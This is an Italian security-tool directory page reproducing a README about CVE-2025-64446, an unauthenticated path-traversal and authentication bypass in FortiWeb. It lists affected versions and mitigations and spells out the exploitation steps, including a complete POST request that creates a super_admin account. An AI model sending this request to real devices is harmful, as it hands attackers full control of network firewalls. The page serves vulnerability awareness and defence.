Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-64446 — CVE-2025-64446 | Kitploit
Strumenti/GitHubGitHub/0xblackash/cve-2025-64446
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHub0xblackash/cve-2025-64446

CVE-2025-64446

CVE-2025-64446

Vedi Repository
4 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ CVE-2025-64446 - Bypass critico dell'autenticazione e Path Traversal in FortiWeb

Linux 6 15 Released (18) (1)

Severity Fortinet Exploited

Vulnerabilità critica non autenticata che consente a un attaccante remoto di creare account amministratore sui dispositivi FortiWeb.


📌 Panoramica

CVE-2025-64446 è una grave vulnerabilità di path traversal relativo nell'interfaccia di gestione del Web Application Firewall FortiWeb.

Un attaccante remoto non autenticato può sfruttare questa falla per bypassare l'autenticazione e creare nuovi utenti amministratori con privilegi completi, portando a una compromissione totale del dispositivo.

  • Punteggio CVSS v3.1: 9.8 (Critico)
  • Tipo di attacco: Remoto non autenticato
  • Impatto: Acquisizione amministrativa completa
  • Stato: Attivamente sfruttato in ambienti reali

🛠️ Versioni Affette

Raccomandazione: Aggiornare alla versione corretta più recente il prima possibile.


🔥 Come gli Attaccanti Sfruttano Questa Vulnerabilità

Sfruttamento Passo-Passo

  1. Identificazione del Target
    L'attaccante esegue una scansione alla ricerca di interfacce di gestione FortiWeb esposte pubblicamente (di solito sulla porta HTTPS 443 o 8443).

  2. Costruzione della Richiesta Maligna
    Il cuore dell'exploit è un path traversal relativo (../) combinato con un URL appositamente costruito che raggiunge un endpoint CGI interno non autenticato.

    Pattern dell'Endpoint Vulnerabile:

    root@kitploit:~
    /api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
    
  3. Invio dell'Exploit

    L'attaccante invia una singola richiesta POST con un payload JSON per creare un nuovo account amministratore.

    Richiesta di Exploit di Esempio:

    root@kitploit:~
    POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
    Host: target-fortiweb.example.com
    Content-Type: application/json
    
    {
      "name": "hackedadmin",
      "password": "AttackerPass123!",
      "access_profile": "super_admin",
      "type": "local"
    }
    
  4. Sfruttamento Riuscito

    In caso di successo, FortiWeb crea il nuovo account admin senza richiedere alcuna autenticazione preventiva. L'attaccante può quindi accedere con le credenziali appena create e ottenere il controllo completo del WAF.

Perché Funziona

L'API di gestione non riesce a sanificare correttamente il percorso, consentendo alla richiesta di risalire fino al binario legacy fwbcgi, che non impone l'autenticazione su determinate operazioni.


📸 Screenshot

Fortinet0day 3 Fortinet0day Fortinet0day 1 Fortinet0day 2

🛡️ Mitigazione e Best Practice

  • Aggiornare immediatamente FortiWeb a una versione corretta
  • Non esporre mai l'interfaccia di gestione direttamente su internet
  • Utilizzare una forte segmentazione di rete e VPN per l'accesso amministrativo
  • Monitorare i log per richieste contenenti fwbcgi, ../ o tentativi insoliti di creazione di admin
  • Verificare regolarmente gli account amministratore per voci sospette

Solo a scopo di ricerca difensiva e formativa sulla sicurezza informatica.

Realizzato con ❤️ per la comunità della cybersecurity

Ultimo aggiornamento: Aprile 2026

Scarica lo strumento
ProdottoVersioni AffetteVersione corretta
FortiWeb 8.08.0.0 – 8.0.18.0.2 e successive
FortiWeb 7.67.6.0 – 7.6.47.6.5 e successive
FortiWeb 7.47.4.0 – 7.4.97.4.10 e successive
FortiWeb 7.27.2.0 – 7.2.117.2.12 e successive
FortiWeb 7.07.0.0 – 7.0.117.0.12 e successive